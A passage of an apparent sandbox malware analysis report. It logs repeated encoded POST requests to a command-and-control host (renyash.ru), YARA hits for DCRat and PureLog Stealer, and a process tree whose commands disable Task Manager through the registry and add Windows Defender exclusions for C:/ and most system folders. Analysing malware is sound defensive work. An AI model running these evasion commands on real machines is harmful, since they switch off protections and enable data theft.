                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M85P%2BQJNQvhi%2FwURw5rf9Hh%2FBqZ2IcQtmLUitMUIEXpkZOp3TzDS4CQ9uFM7woiLLhTiOjkyjIxV9otR3isRFgrmOowCsXf3ddkRkHVosMYzuxjlfqcebpu8Ce5c2nW8h9R79SsP"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90086009da1dc42a-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2148&min_rtt=1499&rtt_var=1860&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=218203&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                135192.168.2.450143104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:36.867213964 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:37.223577023 CET2504OUTData Raw: 5d 5b 54 50 5a 49 5a 5d 54 5d 55 5a 50 5b 59 5a 50 54 5a 5a 57 55 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ][TPZIZ]T]UZP[YZPTZZWUPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#.5%+ %=35S4?=Y;;^+?'23"-$;"T8?5#X'/\/
                                                                                Jan 11, 2025 23:34:37.310647011 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:37.549827099 CET803INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:37 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g3N4%2FEAoe0w8uRhNAvpzVYfph9aaKVO2P6iKifGGYd%2FKQjwMxg2pzDJC9CgJDCPKtq7HIkOyd8MRSRs2RQYBOLCqR993i0qL5AZUiLfTEChsRXkzwwvWQ0Q01LnkLjtWlAPGyogU"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 9008600eeb8442f5-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2323&min_rtt=1691&rtt_var=1898&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=216392&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                136192.168.2.450144104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:37.681149006 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:38.036092043 CET2504OUTData Raw: 58 5d 51 54 5a 43 5f 58 54 5d 55 5a 50 58 59 5f 50 55 5a 5d 57 57 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X]QTZC_XT]UZPXY_PUZ]WWPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU :6B28[1!"3?5V48+??1U.';"](%#X'/\/4
                                                                                Jan 11, 2025 23:34:38.134295940 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:38.293664932 CET806INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:38 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oJFity7d91eiSnlsgFC6Si29nB6jDtmlFrmz4c7dc5AZvBs%2FU%2BjnM8BP4SqsOhBwKB5e2OTMQH1tNVkfl4B8GKFOTI67%2BFkE0%2F8XNQB3lo9HglgR3zPYDQBIKjt869X2oncR7no8"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 900860141aa343c4-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3378&min_rtt=2177&rtt_var=3218&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=123875&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                137192.168.2.450145104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:38.434056997 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:38.786257982 CET2504OUTData Raw: 58 5a 54 55 5a 40 5a 5e 54 5d 55 5a 50 5a 59 5d 50 55 5a 5f 57 52 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XZTUZ@Z^T]UZPZY]PUZ_WRPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#:U*&<X&"%_$/.7</+4)<(%1.]5?<#X'/\/<
                                                                                Jan 11, 2025 23:34:38.879250050 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:39.036425114 CET797INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:38 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aJ8j52AKNK3aDTbAXHof3unFr2l2dd5IWLbWwoNpR5fe3hc6KzewIB63HBtRCFcEusfTL6gQ6Cb6JdsqCYXAjkwsxqBfJEZukNB%2F5w2hby1iPQfovRyRHbJANQmo%2FdfwUXfK5jwh"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90086018bb3b8cee-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3604&min_rtt=1985&rtt_var=3984&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=97698&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a
                                                                                Data Ascii: 4<YW[
                                                                                Jan 11, 2025 23:34:39.123140097 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:17:31:56
                                                                                Start date:11/01/2025
                                                                                Path:C:\Users\user\Desktop\OisrvsB6Ea.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\OisrvsB6Ea.exe"
                                                                                Imagebase:0x270000
                                                                                File size:1'899'080 bytes
                                                                                MD5 hash:092F45DAC00EF24F3836DBFE18DFA931
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1668531861.00000000053CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:1
                                                                                Start time:17:31:56
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\zavVQKy7Y1920izKCt5xjM9GjoXxNpPSllMDj1uh.vbe"
                                                                                Imagebase:0x230000
                                                                                File size:147'456 bytes
                                                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:5
                                                                                Start time:17:32:25
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\XyQqwqHSpVeTNnNDm2Xa4eg.bat" "
                                                                                Imagebase:0x240000
                                                                                File size:236'544 bytes
                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:6
                                                                                Start time:17:32:25
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:7
                                                                                Start time:17:32:26
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\SysWOW64\reg.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                                Imagebase:0x780000
                                                                                File size:59'392 bytes
                                                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:8
                                                                                Start time:17:32:26
                                                                                Start date:11/01/2025
                                                                                Path:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Roaming\ComProviderDriversavescrt/ComrefNetsvc.exe"
                                                                                Imagebase:0xbc0000
                                                                                File size:2'072'064 bytes
                                                                                MD5 hash:7A6B9E23ECCB90B36EB6A4FE87427D41
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.2129339680.0000000012640000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000000.1964321425.0000000000012000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, Author: Joe Security
                                                                                Antivirus matches:
                                                                                • Detection: 83%, ReversingLabs
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:9
                                                                                Start time:17:32:28
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:10
                                                                                Start time:17:32:28
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:11
                                                                                Start time:17:32:28
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:12
                                                                                Start time:17:32:28
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:13
                                                                                Start time:17:32:28
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:14
                                                                                Start time:17:32:28
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:15
                                                                                Start time:17:32:28
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:16
                                                                                Start time:17:32:28
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:17
                                                                                Start time:17:32:28
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:18
                                                                                Start time:17:32:28
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:19
                                                                                Start time:17:32:28
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:20
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:21
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:22
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:23
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:24
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:25
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:26
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:27
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:28
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:29
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:30
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:31
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:32
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Modules\sihost.exe'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:33
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\PrintHood\SearchApp.exe'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:34
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:35
